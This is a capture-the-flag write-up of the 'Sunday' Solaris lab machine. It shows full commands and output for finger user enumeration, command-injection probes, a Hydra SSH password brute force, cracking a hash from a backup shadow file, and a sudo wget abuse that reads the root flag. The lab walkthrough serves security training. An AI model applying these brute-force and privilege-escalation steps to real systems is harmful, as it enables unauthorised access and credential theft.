Търсене в общността

# Enumeration Stage ### NMAP There is a firewall that is filtering our requests. To bypass it I have ran the script with the -sS and -A tags. 1. sS (TCP SYN scan) SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, also relatively unobtrusive and stealthy since it never completes TCP connections. SYN scan works connection. You send a SYN packet, as if you are going to open a real connection and then wait for a response. A SYN/ACK indicates the port is listening (open), while a RST (reset) is indicative of a is received. The port is also considered open if a SYN packet (without the ACK flag) is received in TCP connect scan is the default TCP scan type when SYN scan is not an option. The service scan reveals five open ports. # nmap -p- 10.10.10.76 -sV -sC -T4 PORT STATE SERVICE VERSION 79/tcp open finger Sun Solaris fingerd |_finger: No one logged on\x0D 111/tcp open rpcbind 2-4 (RPC #100000) 22022/tcp open ssh SunSSH 1.3 (protocol 2.0) | ssh-hostkey: | 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA) |_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA) 44060/tcp open unknown 44273/tcp open rpcbind Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos ### Port 79/tcp finger **Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files. [This website(hacktricks.xyz)](https://book.hacktricks.xyz/pentesting/pentesting-finger) reveals **really** cool information on the service and ways to exploit it. # finger [email protected] 130 ⨯ Login Name TTY Idle When Where xvm xVM User < . . . . > openldap OpenLDAP User < . . . . > nobody NFS Anonymous Access < . . . . > noaccess No Access User < . . . . > nobody4 SunOS 4.x NFS Anonym < . . . . > ###### metasploit finger user enumeraion We have already enumerated some users but it doesn't hurt to try the metasploit module too. From the output we understand that there is an mysql user too. msf6 auxiliary(scanner/finger/finger_users) > run msf6 auxiliary(scanner/finger/finger_users) > run [+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: sunny [+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: adm [+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: lp [+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: uucp [+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: nuucp [+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: dladm [+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: listen [+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: bin [+] 10.10.10.76:79 - 10.10.10.76:79 Users found: adm, bin, dladm, listen, lp, nuucp, sunny, uucp [*] 10.10.10.76:79 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ###### Command injection test # finger "/bin/ls -a /@10.10.10.76" 1 ⨯ Login Name TTY Idle When Where /bin/ls ??? -a ??? / ??? # finger "|[email protected]" Login Name TTY Idle When Where |ls ??? ### Port 111/tcp portmapper In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111 is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through 34000 on ***Solaris*** hosts) to identify RPC services that are open to direct attack. You can run ***nmap*** with the ***-sR*** option to identify RPC services listening on high ports if the portmapper is inaccessible. ### Bruteforcing ssh service Found password "sunday". # hydra -I -l sunny -P /home/kali/passwords.txt -t 16 -s 22022 ssh://10.10.10.76 [delete] [DATA] attacking ssh://10.10.10.76:22022/ [22022][ssh] host: 10.10.10.76 login: sunny password: sunday 1 of 1 target successfully completed, 1 valid password found # Privilege Escalation Logging through ssh using sunny:sunday as username:password. # ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected] -p 22022 1 ⚙ Password: Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4 Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008 sunny@sunday:~$ Weird file sunny@sunday:/tmp$ cat ogl_select253 SUNWtext mesa NVDAnvda nvidia Path poison attempt. Upon logging in, I tried sudo -l and I see that /root/troll does not require password to run. Upon running my guess is that it invokes a system call "id". Therefore I am creating a file /bin/bash with the name "id" and exporting the path to that file to be executed when invoked therefore root will run /bin/bash and I should privesc. Unfortunately, the attempt is unsuccessful.```bash sunny@sunday:/usr/share$ sudo -l User sunny may run the following commands on this host: (root) NOPASSWD: /root/troll sunny@sunday:/usr/share$ sudo /root/troll testing uid=0(root) gid=0(root) sunny@sunday:/tmp/$ cp /bin/bash /tmp/id sunny@sunday:/tmp/$ chmod 777 id sunny@sunday:/tmp/$ echo $PATH /usr/gnu/bin:/usr/bin:/usr/X11/bin:/usr/sbin:/sbin sunny@sunday:/tmp/$ export PATH=/tmp:$PATH sunny@sunday:/tmp/$ sudo /root/troll testing uid=0(root) gid=0(root) I have discovered a backup shadow file containing sammy's pass hash. sunny@sunday:/backup$ cat shadow.backup mysql:NP::::::: openldap:*LK*::::::: webservd:*LK*::::::: postgres:NP::::::: svctag:*LK*:6445:::::: nobody:*LK*:6445:::::: noaccess:*LK*:6445:::::: nobody4:*LK*:6445:::::: sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636:::::: By using john, i have managed to extract the passwd from the hash. username:password == sammy:cooldude! # john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:26 0.74% (ETA: 12:51:05) 0g/s 4771p/s 4771c/s 4771C/s dtown214..balls2 cooldude! (sammy) 1g 0:00:00:43 DONE (2021-05-17 11:53) 0.02300g/s 4687p/s 4687c/s 4687C/s domonique1..chrystelle Use the "--show" option to display all of the cracked passwords reliably Session completed Changing user to sammy. I once again tested the mandatory "sudo -l" command and received a ***NOPASSWD*** for ***/usr/bin/wget***. According to [GTFO binaries](https://gtfobins.github.io/gtfobins/wget/) we can escalate privileges by downloading our own file and saving it to our victim (such as shadow) or simply use wget to read out files. sunny@sunday:/tmp$ sudo -l User sammy may run the following commands on this host: (root) NOPASSWD: /usr/bin/wget sunny@sunday:/tmp$ LFILE=/root/root.txt sunny@sunday:/tmp$ sudo wget -i $LFILE /root/root.txt: Invalid URL <fb40..ROOT FLAG>: Unsupported scheme No URLs found in /root/root.txt. sunny@sunday:/tmp$